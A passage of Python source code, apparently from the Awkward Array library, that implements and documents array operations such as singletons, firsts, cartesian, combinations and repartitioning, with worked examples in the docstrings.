        layout, getfunction, pass_depth=True, pass_user=True, user=axis
    )
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def singletons(array, highlevel=True, behavior=None):
    """
    Args:
        array: Data to wrap in lists of length 1 if present and length 0
            if missing (None).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Returns a singleton list (length 1) wrapping each non-missing value and
    an empty list (length 0) in place of each missing value.

    For example,

        >>> array = ak.Array([1.1, 2.2, None, 3.3, None, None, 4.4, 5.5])
        >>> print(ak.singletons(array))
        [[1.1], [2.2], [], [3.3], [], [], [4.4], [5.5]]

    See #ak.firsts to invert this function.
    """

    def getfunction(layout):
        nplike = ak.nplike.of(layout)
        if not isinstance(layout, ak._util.optiontypes):
            # Non-option nodes have no missing values; keep descending.
            return None
        # Build list offsets directly: start with per-item counts of 1,
        # zero out the missing slots, then cumulative-sum into offsets.
        missing = nplike.asarray(layout.bytemask()).view(np.bool_)
        counts = nplike.ones(len(layout) + 1, dtype=np.int64)
        counts[0] = 0
        counts[1:][missing] = 0
        nplike.cumsum(counts, out=counts)
        # project() drops the missing values, matching the empty lists.
        return lambda: ak.layout.ListOffsetArray64(
            ak.layout.Index64(counts), layout.project()
        )

    layout = ak.operations.convert.to_layout(array)
    out = ak._util.recursively_apply(layout, getfunction, pass_depth=False)
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def firsts(array, axis=1, highlevel=True, behavior=None):
    """
    Args:
        array: Data from which to select the first elements from nested lists.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Selects the first element of each non-empty list and inserts None for each
    empty list.

    For example,

        >>> array = ak.Array([[1.1], [2.2], [], [3.3], [], [], [4.4], [5.5]])
        >>> print(ak.firsts(array))
        [1.1, 2.2, None, 3.3, None, None, 4.4, 5.5]

    See #ak.singletons to invert this function.
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )

    if isinstance(layout, ak.partition.PartitionedArray):
        # Every partition must agree on the wrapped axis depth.
        depth = None
        for part in layout.partitions:
            wrapped = part.axis_wrap_if_negative(axis)
            if depth is None:
                depth = wrapped
            elif depth != wrapped:
                raise ValueError(
                    "ak.firsts for partitions with different axis depths"
                    + ak._util.exception_suffix(__file__)
                )
    else:
        depth = layout.axis_wrap_if_negative(axis)

    if depth == 0:
        # axis=0 selects the first element of the whole array (None if empty).
        out = layout[0] if len(layout) > 0 else None
    else:
        if depth < 0:
            raise NotImplementedError(
                "ak.firsts with ambiguous negative axis"
                + ak._util.exception_suffix(__file__)
            )
        # Mask out empty lists (so indexing them yields None), then take
        # element 0 at the target depth.
        index_first = (slice(None),) * depth + (0,)
        nonempty = ak.num(layout, axis=depth) > 0
        out = ak.mask(layout, nonempty, highlevel=False)[index_first]

    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def cartesian(
    arrays,
    axis=1,
    nested=None,
    parameters=None,
    with_name=None,
    highlevel=True,
    behavior=None,
):
    """
    Args:
        arrays (dict or iterable of arrays): Arrays on which to compute the
            Cartesian product.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        nested (None, True, False, or iterable of str or int): If None or
            False, all combinations of elements from the `arrays` are
            produced at the same level of nesting; if True, they are grouped
            in nested lists by combinations that share a common item from
            each of the `arrays`; if an iterable of str or int, group common
            items for a chosen set of keys from the `array` dict or integer
            slots of the `array` iterable.
        parameters (None or dict): Parameters for the new
            #ak.layout.RecordArray node that is created by this operation.
        with_name (None or str): Assigns a `"__record__"` name to the new
            #ak.layout.RecordArray node that is created by this operation
            (overriding `parameters`, if necessary).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Computes a Cartesian product (i.e. cross product) of data from a set of
    `arrays`. This operation creates records (if `arrays` is a dict) or tuples
    (if `arrays` is another kind of iterable) that hold the combinations
    of elements, and it can introduce new levels of nesting.

    As a simple example with `axis=0`, the Cartesian product of

        >>> one = ak.Array([1, 2, 3])
        >>> two = ak.Array(["a", "b"])

    is

        >>> ak.to_list(ak.cartesian([one, two], axis=0))
        [(1, 'a'), (1, 'b'), (2, 'a'), (2, 'b'), (3, 'a'), (3, 'b')]

    With nesting, a new level of nested lists is created to group combinations
    that share the same element from `one` into the same list.

        >>> ak.to_list(ak.cartesian([one, two], axis=0, nested=True))
        [[(1, 'a'), (1, 'b')], [(2, 'a'), (2, 'b')], [(3, 'a'), (3, 'b')]]

    The primary purpose of this function, however, is to compute a different
    Cartesian product for each element of an array: in other words, `axis=1`.
    The following arrays each have four elements.

        >>> one = ak.Array([[1, 2, 3], [], [4, 5], [6]])
        >>> two = ak.Array([["a", "b"], ["c"], ["d"], ["e", "f"]])

    The default `axis=1` produces 6 pairs from the Cartesian product of
    `[1, 2, 3]` and `["a", "b"]`, 0 pairs from `[]` and `["c"]`, 1 pair from
    `[4, 5]` and `["d"]`, and 1 pair from `[6]` and `["e", "f"]`.

        >>> ak.to_list(ak.cartesian([one, two]))
        [[(1, 'a'), (1, 'b'), (2, 'a'), (2, 'b'), (3, 'a'), (3, 'b')],
         [],
         [(4, 'd'), (5, 'd')],
         [(6, 'e'), (6, 'f')]]

    The nesting depth is the same as the original arrays; with `nested=True`,
    the nesting depth is increased by 1 and tuples are grouped by their
    first element.

        >>> ak.to_list(ak.cartesian([one, two], nested=True))
        [[[(1, 'a'), (1, 'b')], [(2, 'a'), (2, 'b')], [(3, 'a'), (3, 'b')]],
         [],
         [[(4, 'd')], [(5, 'd')]],
         [[(6, 'e'), (6, 'f')]]]

    These tuples are #ak.layout.RecordArray nodes with unnamed fields. To
    name the fields, we can pass `one` and `two` in a dict, rather than a list.

        >>> ak.to_list(ak.cartesian({"x": one, "y": two}))
        [
         [{'x': 1, 'y': 'a'},
          {'x': 1, 'y': 'b'},
          {'x': 2, 'y': 'a'},
          {'x': 2, 'y': 'b'},
          {'x': 3, 'y': 'a'},
          {'x': 3, 'y': 'b'}],
         [],
         [{'x': 4, 'y': 'd'},
          {'x': 5, 'y': 'd'}],
         [{'x': 6, 'y': 'e'},
          {'x': 6, 'y': 'f'}]
        ]

    With more than two elements in the Cartesian product, `nested` can specify
    which are grouped and which are not. For example,

        >>> one = ak.Array([1, 2, 3, 4])
        >>> two = ak.Array([1.1, 2.2, 3.3])
        >>> three = ak.Array(["a", "b"])

    can be left entirely ungrouped:

        >>> ak.to_list(ak.cartesian([one, two, three], axis=0))
        [
         (1, 1.1, 'a'),
         (1, 1.1, 'b'),
         (1, 2.2, 'a'),
         (1, 2.2, 'b'),
         (1, 3.3, 'a'),
         (1, 3.3, 'b'),
         (2, 1.1, 'a'),
         (2, 1.1, 'b'),
         (2, 2.2, 'a'),
         (2, 2.2, 'b'),
         (2, 3.3, 'a'),
         (2, 3.3, 'b'),
         (3, 1.1, 'a'),
         (3, 1.1, 'b'),
         (3, 2.2, 'a'),
         (3, 2.2, 'b'),
         (3, 3.3, 'a'),
         (3, 3.3, 'b'),
         (4, 1.1, 'a'),
         (4, 1.1, 'b'),
         (4, 2.2, 'a'),
         (4, 2.2, 'b'),
         (4, 3.3, 'a'),
         (4, 3.3, 'b')
        ]

    can be grouped by `one` (adding 1 more dimension):

        >>> ak.to_list(ak.cartesian([one, two, three], axis=0, nested=[0]))
        [
         [(1, 1.1, 'a'), (1, 1.1, 'b'), (1, 2.2, 'a')],
         [(1, 2.2, 'b'), (1, 3.3, 'a'), (1, 3.3, 'b')],
         [(2, 1.1, 'a'), (2, 1.1, 'b'), (2, 2.2, 'a')],
         [(2, 2.2, 'b'), (2, 3.3, 'a'), (2, 3.3, 'b')],
         [(3, 1.1, 'a'), (3, 1.1, 'b'), (3, 2.2, 'a')],
         [(3, 2.2, 'b'), (3, 3.3, 'a'), (3, 3.3, 'b')],
         [(4, 1.1, 'a'), (4, 1.1, 'b'), (4, 2.2, 'a')],
         [(4, 2.2, 'b'), (4, 3.3, 'a'), (4, 3.3, 'b')]
        ]

    can be grouped by `one` and `two` (adding 2 more dimensions):

        >>> ak.to_list(ak.cartesian([one, two, three], axis=0, nested=[0, 1]))
        [
         [
          [(1, 1.1, 'a'), (1, 1.1, 'b')],
          [(1, 2.2, 'a'), (1, 2.2, 'b')],
          [(1, 3.3, 'a'), (1, 3.3, 'b')]
         ],
         [
          [(2, 1.1, 'a'), (2, 1.1, 'b')],
          [(2, 2.2, 'a'), (2, 2.2, 'b')],
          [(2, 3.3, 'a'), (2, 3.3, 'b')]
         ],
         [
          [(3, 1.1, 'a'), (3, 1.1, 'b')],
          [(3, 2.2, 'a'), (3, 2.2, 'b')],
          [(3, 3.3, 'a'), (3, 3.3, 'b')]],
         [
          [(4, 1.1, 'a'), (4, 1.1, 'b')],
          [(4, 2.2, 'a'), (4, 2.2, 'b')],
          [(4, 3.3, 'a'), (4, 3.3, 'b')]]
        ]

    or grouped by unique `one`-`two` pairs (adding 1 more dimension):

        >>> ak.to_list(ak.cartesian([one, two, three], axis=0, nested=[1]))
        [
         [(1, 1.1, 'a'), (1, 1.1, 'b')],
         [(1, 2.2, 'a'), (1, 2.2, 'b')],
         [(1, 3.3, 'a'), (1, 3.3, 'b')],
         [(2, 1.1, 'a'), (2, 1.1, 'b')],
         [(2, 2.2, 'a'), (2, 2.2, 'b')],
         [(2, 3.3, 'a'), (2, 3.3, 'b')],
         [(3, 1.1, 'a'), (3, 1.1, 'b')],
         [(3, 2.2, 'a'), (3, 2.2, 'b')],
         [(3, 3.3, 'a'), (3, 3.3, 'b')],
         [(4, 1.1, 'a'), (4, 1.1, 'b')],
         [(4, 2.2, 'a'), (4, 2.2, 'b')],
         [(4, 3.3, 'a'), (4, 3.3, 'b')]
        ]

    The order of the output is fixed: it is always lexicographical in the
    order that the `arrays` are written. (Before Python 3.6, the order of
    keys in a dict were not guaranteed, so the dict interface is not
    recommended for these versions of Python.) Thus, it is not possible to
    group by `three` in the example above.

    To emulate an SQL or Pandas "group by" operation, put the keys that you
    wish to group by *first* and use `nested=[0]` or `nested=[n]` to group by
    unique n-tuples. If necessary, record keys can later be reordered with a
    list of strings in #ak.Array.__getitem__.

    To get list index positions in the tuples/records, rather than data from
    the original `arrays`, use #ak.argcartesian instead of #ak.cartesian. The
    #ak.argcartesian form can be particularly useful as nested indexing in
    #ak.Array.__getitem__.
    """
    is_partitioned = False
    if isinstance(arrays, dict):
        behavior = ak._util.behaviorof(*arrays.values(), behavior=behavior)
        nplike = ak.nplike.of(*arrays.values())
        new_arrays = {}
        for n, x in arrays.items():
            new_arrays[n] = ak.operations.convert.to_layout(
                x, allow_record=False, allow_other=False
            )
            if isinstance(new_arrays[n], ak.partition.PartitionedArray):
                is_partitioned = True
    else:
        behavior = ak._util.behaviorof(*arrays, behavior=behavior)
        nplike = ak.nplike.of(*arrays)
        new_arrays = []
        for x in arrays:
            new_arrays.append(
                ak.operations.convert.to_layout(
                    x, allow_record=False, allow_other=False
                )
            )
            if isinstance(new_arrays[-1], ak.partition.PartitionedArray):
                is_partitioned = True

    if with_name is not None:
        if parameters is None:
            parameters = {}
        else:
            parameters = dict(parameters)
        parameters["__record__"] = with_name

    if isinstance(new_arrays, dict):
        new_arrays_values = list(new_arrays.values())
    else:
        new_arrays_values = new_arrays

    posaxis = new_arrays_values[0].axis_wrap_if_negative(axis)
    if posaxis < 0:
        raise ValueError(
            "negative axis depth is ambiguous" + ak._util.exception_suffix(__file__)
        )
    for x in new_arrays_values[1:]:
        if x.axis_wrap_if_negative(axis) != posaxis:
            raise ValueError(
                "arrays to cartesian-product do not have the same depth for "
                "negative axis" + ak._util.exception_suffix(__file__)
            )

    if posaxis == 0:
        if nested is None or nested is False:
            nested = []

        if isinstance(new_arrays, dict):
            if nested is True:
                nested = list(new_arrays.keys())  # last key is ignored below
            # BUG FIX: this generator formerly read `for x in nested` while
            # testing `n`, which raises NameError (or tests a stale binding)
            # whenever `nested` is non-empty; iterate and test the same name.
            if any(not (isinstance(n, str) and n in new_arrays) for n in nested):
                raise ValueError(
                    "the 'nested' parameter of cartesian must be dict keys "
                    "for a dict of arrays" + ak._util.exception_suffix(__file__)
                )
            recordlookup = []
            layouts = []
            tonested = []
            for i, (n, x) in enumerate(new_arrays.items()):
                recordlookup.append(n)
                layouts.append(x)
                if n in nested:
                    tonested.append(i)
            nested = tonested
        else:
            if nested is True:
                nested = list(range(len(new_arrays) - 1))
            if any(
                not (isinstance(x, int) and 0 <= x < len(new_arrays) - 1)
                for x in nested
            ):
                # (typo "prarmeter" fixed in this message)
                raise ValueError(
                    "the 'nested' parameter of cartesian must be integers in "
                    "[0, len(arrays) - 1) for an iterable of arrays"
                    + ak._util.exception_suffix(__file__)
                )
            recordlookup = None
            layouts = []
            for x in new_arrays:
                layouts.append(x)

        layouts = [
            x.toContent() if isinstance(x, ak.partition.PartitionedArray) else x
            for x in layouts
        ]

        # meshgrid of each array's index range gives every combination; each
        # grid is flattened into an IndexedArray over the original layout.
        indexes = [
            ak.layout.Index64(x.reshape(-1))
            for x in nplike.meshgrid(
                *[nplike.arange(len(x), dtype=np.int64) for x in layouts], indexing="ij"
            )
        ]
        # NOTE: `zip` is shadowed by this module's own ak.zip function, so the
        # builtin must be fetched from __builtins__ explicitly.
        outs = [
            ak.layout.IndexedArray64(x, y)
            for x, y in __builtins__["zip"](indexes, layouts)
        ]

        result = ak.layout.RecordArray(outs, recordlookup, parameters=parameters)
        for i in range(len(new_arrays) - 1, -1, -1):
            if i in nested:
                result = ak.layout.RegularArray(result, len(layouts[i + 1]), 0)

    elif is_partitioned:
        # Align all inputs on the partitioning of one sample PartitionedArray,
        # compute the product partition-by-partition, and reassemble.
        sample = None
        if isinstance(new_arrays, dict):
            for x in new_arrays.values():
                if isinstance(x, ak.partition.PartitionedArray):
                    sample = x
                    break
        else:
            for x in new_arrays:
                if isinstance(x, ak.partition.PartitionedArray):
                    sample = x
                    break
        partition_arrays = ak.partition.partition_as(sample, new_arrays)

        output = []
        for part_arrays in ak.partition.iterate(
            sample.numpartitions, partition_arrays
        ):
            output.append(
                cartesian(
                    part_arrays,
                    axis=axis,
                    nested=nested,
                    parameters=parameters,
                    with_name=None,  # already set: see above
                    highlevel=False,
                )
            )

        result = ak.partition.IrregularlyPartitionedArray(output)

    else:
        # General case: give array i a new length-1 axis for every *other*
        # array, then let broadcasting expand those axes into the product.
        def newaxis(layout, i):
            # Wrap `layout` in `i` levels of length-1 regular lists.
            if i == 0:
                return layout
            else:
                return ak.layout.RegularArray(newaxis(layout, i - 1), 1, 0)

        def getgetfunction1(i):
            def getfunction1(layout, depth):
                if depth == 2:
                    return lambda: newaxis(layout, i)
                else:
                    return None

            return getfunction1

        def getgetfunction2(i):
            def getfunction2(layout, depth):
                if depth == posaxis:
                    inside = len(new_arrays) - i - 1
                    outside = i
                    if (
                        layout.parameter("__array__") == "string"
                        or layout.parameter("__array__") == "bytestring"
                    ):
                        raise ValueError(
                            "ak.cartesian does not compute combinations of the "
                            "characters of a string; please split it into lists"
                            + ak._util.exception_suffix(__file__)
                        )
                    nextlayout = ak._util.recursively_apply(
                        layout, getgetfunction1(inside), pass_depth=True
                    )
                    return lambda: newaxis(nextlayout, outside)
                else:
                    return None

            return getfunction2

        def apply(x, i):
            # Insert the length-1 axes for array slot i.
            layout = ak.operations.convert.to_layout(
                x, allow_record=False, allow_other=False
            )
            return ak._util.recursively_apply(
                layout, getgetfunction2(i), pass_depth=True
            )

        toflatten = []
        if nested is None or nested is False:
            nested = []

        if isinstance(new_arrays, dict):
            if nested is True:
                nested = list(new_arrays.keys())  # last key is ignored below
            # BUG FIX: same iterate/test name mismatch as in the posaxis == 0
            # branch above (`for x in nested` testing `n`).
            if any(not (isinstance(n, str) and n in new_arrays) for n in nested):
                raise ValueError(
                    "the 'nested' parameter of cartesian must be dict keys "
                    "for a dict of arrays" + ak._util.exception_suffix(__file__)
                )
            recordlookup = []
            layouts = []
            for i, (n, x) in enumerate(new_arrays.items()):
                recordlookup.append(n)
                layouts.append(apply(x, i))
                if i < len(new_arrays) - 1 and n not in nested:
                    toflatten.append(posaxis + i + 1)
        else:
            if nested is True:
                nested = list(range(len(new_arrays) - 1))
            if any(
                not (isinstance(x, int) and 0 <= x < len(new_arrays) - 1)
                for x in nested
            ):
                raise ValueError(
                    "the 'nested' parameter of cartesian must be integers in "
                    "[0, len(arrays) - 1) for an iterable of arrays"
                    + ak._util.exception_suffix(__file__)
                )
            recordlookup = None
            layouts = []
            for i, x in enumerate(new_arrays):
                layouts.append(apply(x, i))
                if i < len(new_arrays) - 1 and i not in nested:
                    toflatten.append(posaxis + i + 1)

        def getfunction3(inputs, depth):
            if depth == posaxis + len(new_arrays):
                if all(len(x) == 0 for x in inputs):
                    inputs = [
                        x.content
                        if isinstance(x, ak.layout.RegularArray) and x.size == 1
                        else x
                        for x in inputs
                    ]
                return lambda: (
                    ak.layout.RecordArray(inputs, recordlookup, parameters=parameters),
                )
            else:
                return None

        out = ak._util.broadcast_and_apply(
            layouts, getfunction3, behavior, right_broadcast=False, pass_depth=True
        )
        assert isinstance(out, tuple) and len(out) == 1
        result = out[0]

        # Flatten away the helper axes for slots that were not kept nested.
        while len(toflatten) != 0:
            flatten_axis = toflatten.pop()
            result = flatten(result, axis=flatten_axis, highlevel=False)

    return ak._util.maybe_wrap(result, behavior, highlevel)
def argcartesian(
    arrays,
    axis=1,
    nested=None,
    parameters=None,
    with_name=None,
    highlevel=True,
    behavior=None,
):
    """
    Args:
        arrays (dict or iterable of arrays): Arrays on which to compute the
            Cartesian product.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        nested (None, True, False, or iterable of str or int): If None or
            False, all combinations of elements from the `arrays` are
            produced at the same level of nesting; if True, they are grouped
            in nested lists by combinations that share a common item from
            each of the `arrays`; if an iterable of str or int, group common
            items for a chosen set of keys from the `array` dict or slots
            of the `array` iterable.
        parameters (None or dict): Parameters for the new
            #ak.layout.RecordArray node that is created by this operation.
        with_name (None or str): Assigns a `"__record__"` name to the new
            #ak.layout.RecordArray node that is created by this operation
            (overriding `parameters`, if necessary).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.

    Computes a Cartesian product (i.e. cross product) of data from a set of
    `arrays`, like #ak.cartesian, but returning integer indexes for
    #ak.Array.__getitem__.

    For example, the Cartesian product of

        >>> one = ak.Array([1.1, 2.2, 3.3])
        >>> two = ak.Array(["a", "b"])

    is

        >>> ak.to_list(ak.cartesian([one, two], axis=0))
        [(1.1, 'a'), (1.1, 'b'), (2.2, 'a'), (2.2, 'b'), (3.3, 'a'), (3.3, 'b')]

    But with argcartesian, only the indexes are returned.

        >>> ak.to_list(ak.argcartesian([one, two], axis=0))
        [(0, 0), (0, 1), (1, 0), (1, 1), (2, 0), (2, 1)]

    These are the indexes that can select the items that go into the actual
    Cartesian product.

        >>> one_index, two_index = ak.unzip(ak.argcartesian([one, two], axis=0))
        >>> one[one_index]
        <Array [1.1, 1.1, 2.2, 2.2, 3.3, 3.3] type='6 * float64'>
        >>> two[two_index]
        <Array ['a', 'b', 'a', 'b', 'a', 'b'] type='6 * string'>

    All of the parameters for #ak.cartesian apply equally to #ak.argcartesian,
    so see the #ak.cartesian documentation for a more complete description.
    """
    if axis < 0:
        raise ValueError(
            "the 'axis' of argcartesian must be non-negative"
            + ak._util.exception_suffix(__file__)
        )

    # Replace each input with its local index, then take the Cartesian
    # product of those indexes instead of the data.
    if isinstance(arrays, dict):
        behavior = ak._util.behaviorof(*arrays.values(), behavior=behavior)
        layouts = {
            n: ak.operations.convert.to_layout(
                x, allow_record=False, allow_other=False
            ).localindex(axis)
            for n, x in arrays.items()
        }
    else:
        behavior = ak._util.behaviorof(*arrays, behavior=behavior)
        layouts = [
            ak.operations.convert.to_layout(
                x, allow_record=False, allow_other=False
            ).localindex(axis)
            for x in arrays
        ]

    if with_name is not None:
        parameters = {} if parameters is None else dict(parameters)
        parameters["__record__"] = with_name

    result = cartesian(
        layouts, axis=axis, nested=nested, parameters=parameters, highlevel=False
    )
    return ak._util.maybe_wrap(result, behavior, highlevel)
def combinations(
    array,
    n,
    replacement=False,
    axis=1,
    fields=None,
    parameters=None,
    with_name=None,
    highlevel=True,
    behavior=None,
):
    """
    Args:
        array: Array from which to choose `n` items without replacement.
        n (int): The number of items to choose in each list: `2` chooses
            unique pairs, `3` chooses unique triples, etc.
        replacement (bool): If True, combinations that include the same
            item more than once are allowed; otherwise each item in a
            combination is strictly unique.
        axis (int): The dimension at which this operation is applied. The
            outermost dimension is `0`, followed by `1`, etc., and negative
            values count backward from the innermost: `-1` is the innermost
            dimension, `-2` is the next level up, etc.
        fields (None or list of str): If None, the pairs/triples/etc. are
            tuples with unnamed fields; otherwise, these `fields` name the
            fields. The number of `fields` must be equal to `n`.
        parameters (None or dict): Parameters for the new
            #ak.layout.RecordArray node that is created by this operation.
        with_name (None or str): Assigns a `"__record__"` name to the new
            #ak.layout.RecordArray node (overriding `parameters`, if
            necessary).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Computes the "upper triangle" of the Cartesian product of `array` with
    itself: all unordered choices of `n` distinct items from each list.
    With `replacement=True`, the diagonal is included, so items may repeat
    (e.g. `('a', 'a')`), though the items stay in their original order.
    For example, choosing pairs within each nested list (`axis=1`):
        >>> array = ak.Array([[1, 2, 3, 4], [], [5], [6, 7, 8]])
        >>> ak.to_list(ak.combinations(array, 2))
        [[(1, 2), (1, 3), (1, 4), (2, 3), (2, 4), (3, 4)],
         [],
         [],
         [(6, 7), (6, 8), (7, 8)]]
    Note that the combinatorics is determined by the items' positions in the
    array, not by equality of their values. Passing `fields` produces records
    instead of tuples:
        >>> ak.to_list(ak.combinations(array, 2, fields=["x", "y"]))[0][:2]
        [{'x': 1, 'y': 2}, {'x': 1, 'y': 3}]
    To get list index positions in the tuples/records, rather than data from
    the original `array`, use #ak.argcombinations instead; that form can be
    particularly useful as nested indexing in #ak.Array.__getitem__.
    """
    # Copy user-supplied parameters so the caller's dict is never mutated.
    record_parameters = {} if parameters is None else dict(parameters)
    if with_name is not None:
        record_parameters["__record__"] = with_name
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    combined = layout.combinations(
        n,
        replacement=replacement,
        keys=fields,
        parameters=record_parameters,
        axis=axis,
    )
    return ak._util.maybe_wrap_like(combined, array, behavior, highlevel)
def argcombinations(
    array,
    n,
    replacement=False,
    axis=1,
    fields=None,
    parameters=None,
    with_name=None,
    highlevel=True,
    behavior=None,
):
    """
    Args:
        array: Array from which to choose `n` items without replacement.
        n (int): The number of items to choose from each list: `2` chooses
            unique pairs, `3` chooses unique triples, etc.
        replacement (bool): If True, combinations that include the same
            item more than once are allowed; otherwise each item in a
            combination is strictly unique.
        axis (int): The dimension at which this operation is applied; must be
            non-negative for this function. `0` is the outermost dimension,
            followed by `1`, etc.
        fields (None or list of str): If None, the pairs/triples/etc. are
            tuples with unnamed fields; otherwise, these `fields` name the
            fields. The number of `fields` must be equal to `n`.
        parameters (None or dict): Parameters for the new
            #ak.layout.RecordArray node that is created by this operation.
        with_name (None or str): Assigns a `"__record__"` name to the new
            #ak.layout.RecordArray node (overriding `parameters`, if
            necessary).
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
    Like #ak.combinations, but the resulting tuples/records contain integer
    index positions (suitable for #ak.Array.__getitem__) rather than data
    from the original `array`.
    See #ak.combinations and #ak.argcartesian for a more complete
    description.
    """
    # Copy user-supplied parameters so the caller's dict is never mutated.
    prepared = {} if parameters is None else dict(parameters)
    if with_name is not None:
        prepared["__record__"] = with_name
    # Index positions are only meaningful relative to a fixed depth, so a
    # negative (inner-relative) axis cannot be supported here.
    if axis < 0:
        raise ValueError(
            "the 'axis' for argcombinations must be non-negative"
            + ak._util.exception_suffix(__file__)
        )
    indexes = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    ).localindex(axis)
    out = indexes.combinations(
        n, replacement=replacement, keys=fields, parameters=prepared, axis=axis
    )
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def partitions(array):
    """
    Args:
        array: A possibly-partitioned array.
    Returns a list of partition lengths if `array` is a
    #ak.partition.PartitionedArray; returns None otherwise.
    Partitioning is internal to an array: a partitioned array behaves
    identically to a non-partitioned one, but possibly with different
    performance characteristics.
    Arrays can only be partitioned in the first dimension; partitioning is
    intended for performing calculations in memory-sized chunks.
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    if not isinstance(layout, ak.partition.PartitionedArray):
        return None
    return layout.lengths
def partitioned(arrays, highlevel=True, behavior=None):
    """
    Args:
        arrays (list of arrays): The arrays to logically concatenate into a
            single partitioned array.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content or #ak.partition.PartitionedArray
            subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns the logical concatenation of `arrays` as a partitioned array.
    Partitioning is internal to an array: a partitioned array behaves
    identically to a non-partitioned one, but possibly with different
    performance characteristics.
    Arrays can only be partitioned in the first dimension; partitioning is
    intended for performing calculations in memory-sized chunks.
    """
    layouts = [
        ak.operations.convert.to_layout(piece, allow_record=False, allow_other=False)
        for piece in arrays
    ]
    # Each stop is the cumulative end index of a partition within the whole.
    stops = []
    running_total = 0
    for layout in layouts:
        running_total += len(layout)
        stops.append(running_total)
    out = ak.partition.IrregularlyPartitionedArray(layouts, stops)
    return ak._util.maybe_wrap(
        out, ak._util.behaviorof(*arrays, behavior=behavior), highlevel
    )
def repartition(array, lengths, highlevel=True, behavior=None):
    """
    Args:
        array: A possibly-partitioned array.
        lengths (None, int, or iterable of int): If None, concatenate the
            pieces of a partitioned array into a non-partitioned array.
            If an integer, split or repartition into partitions of that many
            entries (the last partition receives the remainder, if any).
            If an iterable of integers, split or repartition into the given
            sequence of lengths.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content or #ak.partition.PartitionedArray
            subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Returns a possibly-partitioned array: unpartitioned if `lengths` is None;
    partitioned otherwise.
    Partitioning is internal to an array: a partitioned array behaves
    identically to a non-partitioned one, but possibly with different
    performance characteristics.
    Arrays can only be partitioned in the first dimension; partitioning is
    intended for performing calculations in memory-sized chunks.
    """
    layout = ak.operations.convert.to_layout(
        array, allow_record=False, allow_other=False
    )
    is_partitioned = isinstance(layout, ak.partition.PartitionedArray)
    # lengths=None means "flatten to a single, non-partitioned layout".
    if lengths is None:
        out = layout.toContent() if is_partitioned else layout
        return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
    if isinstance(lengths, (int, numbers.Integral, np.integer)):
        if lengths < 1:
            raise ValueError(
                "lengths must be at least 1 (and probably considerably more)"
                + ak._util.exception_suffix(__file__)
            )
        # Expand a single chunk size into an explicit list of lengths.
        chunk = lengths
        howmany, remainder = divmod(len(layout), chunk)
        lengths = [chunk] * howmany
        if remainder != 0:
            lengths.append(remainder)
    # Convert lengths into cumulative stop indexes and check they exactly
    # cover the array.
    stops = []
    total_length = 0
    for piece_length in lengths:
        total_length += piece_length
        stops.append(total_length)
    if total_length != len(layout):
        raise ValueError(
            "cannot repartition array of length {0} into "
            "these lengths".format(len(layout))
            + ak._util.exception_suffix(__file__)
        )
    if is_partitioned:
        out = layout.repartition(stops)
    else:
        out = ak.partition.IrregularlyPartitionedArray.toPartitioned(layout, stops)
    return ak._util.maybe_wrap_like(out, array, behavior, highlevel)
def virtual(
    generate,
    args=(),
    kwargs=None,
    form=None,
    length=None,
    cache="new",
    cache_key=None,
    parameters=None,
    highlevel=True,
    behavior=None,
):
    """
    Args:
        generate (callable): Function that makes an array from `args` and
            `kwargs`.
        args (tuple): Positional arguments to pass to `generate`.
        kwargs (dict): Keyword arguments to pass to `generate`.
        form (None, Form, or JSON): If None, the layout of the generated array
            is unknown until it is generated, which might require it to be
            generated earlier than intended; if a Form (or a JSON string or a
            JSON-like dict describing one), use it to predict the layout and
            verify that the generated array complies.
        length (None or int): If None or negative, the length of the generated
            array is unknown until it is generated, which might require it to
            be generated earlier than intended; if a non-negative int, use
            this to predict the length and verify that the generated array
            complies.
        cache (None, "new", or MutableMapping): If "new", a new dict
            (keep-forever cache) is created. If None, no cache is used.
        cache_key (None or str): If None, a unique string is generated for
            this virtual array for use with the `cache` (unique per Python
            process); otherwise, the explicitly provided key is used (which
            ought to ensure global uniqueness for the scope in which these
            arrays are used).
        parameters (None or dict): Parameters for the new
            #ak.layout.VirtualArray node that is created by this operation.
        highlevel (bool): If True, return an #ak.Array; otherwise, return
            a low-level #ak.layout.Content subclass.
        behavior (None or dict): Custom #ak.behavior for the output array, if
            high-level.
    Creates a virtual array: an array that is generated on demand by calling
    `generate(*args, **kwargs)` the first time its data are actually needed.
    Supplying `length` allows the array to be sliced, and supplying `form`
    allows its type to be inspected, without triggering materialization; any
